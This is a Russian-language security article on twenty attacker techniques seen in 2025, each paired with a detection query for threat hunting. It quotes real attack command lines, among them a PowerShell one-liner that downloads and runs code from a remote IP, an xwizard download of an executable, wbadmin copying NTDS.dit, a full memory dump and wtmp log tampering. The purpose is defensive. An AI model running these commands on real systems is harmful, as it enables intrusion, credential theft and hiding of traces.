Кибербез мирового уровня: разбор 20 техник

6 мин
200
5
12 мая 2026
Кибербез мирового уровня: разбор 20 техник

1. BOINC

Одна из новинок 2025 года — использование злоумышленниками BOINC, широко известной как «ПО для науки». Это открытая программная платформа университета Беркли для GRID-вычислений. Она позволяет задействовать огромные вычислительные мощности персональных компьютеров со всего мира, которые владельцы предоставляют добровольно. Атакующие использовали BOINC в фишинговой кампании — вместо легитимного обновления устанавливался BOINC-клиент, сконфигурированный подключаться не к научным проектам, а к доменам под контролем атакующих. Обнаружить антивирусными средствами этот инструмент оказалось сложно, ведь он не является ВПО.

Как обнаружить:

		
			

Поискать события запуска файлов, метаданные которых указывают на BOINC:

event_type: "processcreatewin"

 AND

 proc_file_productname: "boinc"

2. Microsoft console debugger

В числе не самых распространённых методов, которые практикуют злоумышленники — применение кода Microsoft console debugger (cdb.exe). Примечательно, что одна из группировок использовала его в переименованном виде для запуска шелл-кода:

C:\ProgramData\fontdrvhost.exe -cf
C:\ProgramData\config.ini -o
C:\ProgramData\fontdrvhost.exe

Важно отметить — злоумышленники часто переименовывают файл, что даёт киберспециалистам больше возможностей для их обнаружения. Поэтому поиски стоит начинать с переименованных копий и определённых параметров командной строки, которые используются для выполнения шелл-кода.

Как обнаружить:

		
			

Поискать события запуска MCD, в том числе переименованного, с параметром -cf:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "cdb.exe"

AND

cmdline: "cf"

3. Скрипты ДЛЯ FTP

Стандартные утилиты (например, FTP) злоумышленники нередко используют для эксфильтрации, в том числе в рамках атак программ-вымогателей. Со стороны ИБ-мониторинга такой трафик часто выглядит как обычная работа легитимного FTP-сервиса. В одной из атак на тайские организации нападающие использовали ftp.exe для выполнения скрипта, замаскированного под обычный PDF-файл:

C:\Windows\System32\ftp.exe -s:"แบบตอบรับ.pdf«»

Как обнаружить:

		
			

Поискать события запуска ftp.exe с параметром -s и подозрительными PDF-файлами:


event_type: "processcreatewin"

AND

proc_file_path: "ftp.exe"

AND

cmdline: ("s" AND *.pdf)

4. VS Code Remote Tunnels

Атакующие продолжают активно использовать сервисы удалённой работы, одним из таких в 2025 году стал VS Code Remote Tunnels. Как минимум в пяти публичных отчётах зарубежных компаний было упомянуто применение этой программы для удалённого подключения к скомпрометированной системе. Детектируется этот метод атак сложно, так как сервис является легитимным.

Как обнаружить:

		
			

Поискать события запуска code.exe с аргументом tunnel:


event_type: "processcreatewin"

AND

proc_file_path: "code.exe"

AND

cmdline: "tunnel"

5. Windows Sandbox

Если ИБ-специалисты используют песочницы, чтобы изучить поведенческие маркеры вредоносных файлов, то злоумышленники применяют их иначе. Например, чтобы внедрить в песочницу ВПО, которое антивирусы не обнаружат. Так, атакующие использовали Windows Sandbox, чтобы запустить кастомизированную версию AsyncRAT.

Как обнаружить:

		
			

Поискать события запуска Window Sandbox с WSB-файлом в аргументах:


event_type: "processcreatewin"

AND

proc_file_name: ("WindowsSandbox.exe" OR "wsb.exe")

AND

cmdline: *.wsb

6. Clickfix

Одна из самых часто используемых техник за рубежом на сегодняшний день — атаки Clickfix. В России они уже тоже не редкость. Это поддельная CAPTCHA: пользователь копирует вредоносную команду, вставляет в систему и по сути самостоятельно запускает вредоносные скрипты. Впервые применение этой тактики было замечено весной 2024 года. За прошедшее время злоумышленники успели придумать целый ряд сценариев её применения. Чаще всего атака начинается со всплывающего окна, имитирующего нотификацию о какой-либо технической проблеме. Меня заинтересовало, как злоумышленники создавали ссылки для скачивания вредоносной нагрузки. Например, атакующие генерировали динамические ссылки на загрузку, используя количество секунд с 1 января 1970 года, и каждую секунду ссылка менялась:

powershell -w h -c
"$u=[int64](([datetime]::UtcNow-
[datetime]'1970-1-1').TotalSeconds)-
band 0xfffffffffffffff0;irm
168.119.173[.]205:8080/$u|iex"

Как обнаружить:

		
			

Использовать различные наборы ключевых слов. Например:


event_type: "processcreatewin"

AND

proc_file_path: "powershell.exe"

AND

cmdline: ("datetime" AND "UtcNow" AND "1970" AND "iex")

Как защититься от фейковых CAPTCHA и атак ClickFix

7. Эмулятор Qemu

В отчётах компаний об инцидентах встречается применение атакующими ещё одной песочницы — Qemu. Это бесплатный эмулятор и гипервизор, позволяющий запускать другие операционные системы в качестве гостевых на компьютере. Злоумышленники использовали его для запуска виртуальной машины и QDoor внутри неё.

"C:\ProgramData\UpdatePackage_excic\wexe" -m 4096 -hda Update_excic.aow2 -netdev user,id=mynet0 -device e1000,netdev=mynet0 -cpu max -display none

Как обнаружить:

		
			

Поискать события запуска, переименованного QEMU с параметром netdev:


event_type: "processcreatewin"

AND

proc_file_productname: "qemu"

AND

cmdline: "netdev"

8. BASE85

Злоумышленники также используют сложные методы запутывания кода — обфускации, включая кодирование Base85. В упомянутом одной из компаний случае атакующие мало того, что использовали Python Launcher, они также обфусцировали саму команду Base85.

"C:/winsystem/py/py.exe" -c exec(import('marshal').loads(import('zlib').decompress(import('base64').b85decode('[redacted]'))))

Как обнаружить:

		
			

event_type: "processcreatewin"

AND

cmdline: "b85decode"

9. ASPIA

В публичных отчётах есть примеры использования непопулярных средств удалённого резервного доступа к скомпрометированной ИТ-инфраструктуре. Мы все привыкли к TeamViewer, AnyDesk, однако малоизвестные сервисы киберпреступники также используют для создания резервных каналов управления. К примеру, киберпартизаны в качестве средства резервного доступа к скомпрометированной ИТ-инфраструктуре использовали Aspia.

Как обнаружить:

		
			

Поискать этот RMM, опираясь, например, на название продукта в метаданных:


event_type: "processcreatewin"

AND

proc_file_productname: "aspia"

10. Снова Clickfix

На одном из теневых форумов злоумышленник рекламировал новый вариант для реализации методов Clickfix. При этом он упомянул, что скрипт способен после достижения цели удалить следы запуска из истории. Так что если у вас что-то очищает RunMRU, то стоит проверить легитимно ли это и кто инициатор.

Как обнаружить:

		
			

Поискать события очистки RunMRU:


event_type: "registryobjdelete"

AND

reg_key_path: "runmru"

11. Microsoft windows resource leak diagnostic

Компании отмечают применение злоумышленниками еще одного LOLBins — Microsoft windows resource leak diagnostic. Это встроенный в Windows инструмент диагностики утечек ресурсов. Атакующие использовали его, чтобы получить дамп памяти.

rdrleakdiag /p [REMOVED] /o
CSIDL_PROFILE\downloads /fullmemdmp
/wait 1

С точки зрения обнаружения здесь всё довольно понятно — необходимо начать поиск события запуска rdrleakdiag.exe с соответствующим параметром.

Как обнаружить:

		
			

event_type: "processcreatewin"

AND

proc_file_path: "rdrleakdiag.exe"

AND

cmdline: "fullmemdmp"

12. Hugging Face API

Конечно, в отчётах об инцидентах всё чаще встречаются примеры использования злоумышленниками LLM. Например, вредоносное ПО LameHug применяет LLM для генерации команд с целью сбора информации о скомпрометированной системе и эксфильтрации данных.

Как обнаружить: 

		
			

Поискать подозрительные файлы, например с расширением .pif, обращающиеся к Hugging Face:


event_type: "dnsreqwin"

AND

dns_rname: huggingface

AND

proc_file_path: *pif

13. UTMPDUMP

Когда ИБ специалисты расследуют инцидент и собирают логи, они задаются вопросом: могли ли злоумышленники что-то поменять в логах? Чаще всего ответ положительный. В системе Linux всё записывается в файлы логов в каталоге /var/log. В этом каталоге есть несколько файлов, таких как utmp, wtmp и btmp. В частности, utmp предоставляет информацию о входе пользователей в систему, терминалах, выходах из системы, системных событиях и текущем состоянии системы, времени загрузки системы и т. д., а wtmp предоставляет исторические данные utmp. В своих отчётах компании перечисляют примеры использования атакующими копий wtmp:

атакующие делали копию wtmp:

utmpdump /var/log/wtmp >/var/log/wtmp.file

Удаляли оттуда свои IP-адреса:

sed -i '//d' /var/log/wtmp.file

И перезаписывали wtmp:

utmpdump -r /var/log/wtmp.file > /var/log/wtmp

Как обнаружить:

		
			

Поискать подозрительные запуски utmpdump:


event_type: "processcreatenix"

AND

proc_file_path: "utmpdump"

cmdline: "wtmp"

14. Файлы DESKTOP

Фишингом уже никого не удивить, но встречаются интересные векторы атак. Например, в прошлом году злоумышленники реализовывали фишинговые почтовые рассылки, нацеленные на пользователей Linux. При этом использовались файлы .desktop, например Document Details.pdf .desktop.

Как обнаружить:

		
			

Поискать открытие подозрительных файлов .desktop.

event_type: "processcreatenix"

AND

cmdline.keyword: /..desktop\s./

15. Wbadmin

Часто в отчётах упоминается Wbadmin. С его помощью можно удалить резервные копии Windows. Злоумышленники могут также скопировать базу данных NTDS.dit:

"C:\Windows\system32\wbadmin.exe" start backup -backupTarget:\localhost\c$\ProgramData\ -include:C:\Windows\NTDS\NTDS.dit -quiet

Как обнаружить:

		
			

В очередной раз можем сфокусироваться на параметрах командной строки.

event_type: "processcreatewin"

AND

proc_file_path: "wbadmin.exe"

AND

cmdline: "ntds.dit"

16. Extensible Wizards Host Process

Атакующие использовали Extensible Wizards Host Process для загрузки вредоносного файла с удаленного сервера:

XwIZarD.exe RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z
 hXXps://gbuarts[.]com/cc/Protected.exe

Как обнаружить:

		
			

Поохотиться за злоупотреблением EWHP.

event_type: "processcreatewin"

AND

proc_file_path: "xwizard.exe"

AND

cmdline: http

17. COM hijacking

В последнее время группировки злоумышленников предпочитают использовать разделы реестра, связанные с com-объектами, чтобы закрепиться в скомпрометированной системе. Например, APT-группировка Rainbow использовала COM hijiacking — это способ закрепиться в Windows, подменяя настройки COM-объектов в реестре:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c
 New-Item -Path
'HKCU:\Software\Classes\CLSID{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force |
 Set-Item -Value 'C:\ProgramData\winnt64_.dll'; [redacted]

Как обнаружить:

		
			

Поискать похожее злоупотребление PowerShell.

event_type: "processcreatewin"

AND

proc_file_path: "powershell.exe"

AND

cmdline: ("InprocServer32" AND "set-item" AND "value")

18. Change default file association

Ещё один нетипичный пример закрепления в системе — Change default file association. (сменить программу по умолчанию для открытия файлов определённого типа). В реальных атаках редко встречается. Злоумышленники модифицировали следующий раздел реестра, чтобы вредоносное ПО запускалось при каждом открытии текстового файла:

HKEY_CLASSES_ROOT\txtfile\shell\open\command

Как обнаружить:

		
			

Поискать события модификации этого раздела.

event_type: "registryvaluesetwin"

AND

reg_key_path: "txtfile\shell\open\command"

19. Maxscriptstatements

Злоумышленники используют Maxscriptstatements, чтобы запустить вредоносные HTML-файлы. В одной из атак они задействовали реестр, чтобы пользователь не получал оповещения при выполнении длинных скриптов и, таким образом, не привлекалось внимание к запуску ВПО:

Значение параметра MaxScriptStatements в
 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles
 выставлялось равным 10 000 000

Как обнаружить:

		
			

Поискать события модификации MaxScriptStatements.


event_type: "registryvaluesetwin"

AND

reg_key_path: "MaxScriptStatements"

20. Request repo

Ещё один легитимный сервис — Request repo, который злоумышленники использовали для анализа HTTP- и DNS-запросов для эксфильтрации аутентификационных данных. Это впоследствии помогало им подключаться к скомпрометированной системе через Visual Studio Code.

Как обнаружить:

		
			

Поискать подозрительные запросы к Request Repo с учетом особенностей ВПО.

event_type: "dnsreqwin"

AND

dns_rname: "requestrepo.com"

AND

proc_file_path: "pythonw.exe"

Злоумышленники постоянно меняют подходы и инструменты, которые используют для совершения атак. Актуальную информацию киберспециалисты аккумулируют и указывают в публичных отчётах, которые, в свою очередь, помогают нам отследить подозрительную активность и оперативно отреагировать на угрозу. Это процесс бесконечный, и нужно постоянно находиться в инфополе.

Важное по теме
Так ли страшен Skynet, как его малюют
Тренды
Читать 5 минут
14.05.2026
О будущей роли искусственного интеллекта в кибератаках и защите от них
Новости
Читать 2 минуты
13.05.2026
ИТ-специалистам предложили рассмотреть переход на другие репозитории
Новости
Читать 3 минуты
13.05.2026
Хакеры методично переходят от простых кибератак на промышленность к более длительным и сложным
Оставьте комментарий
Доступно для авторизованных пользователей
1/1000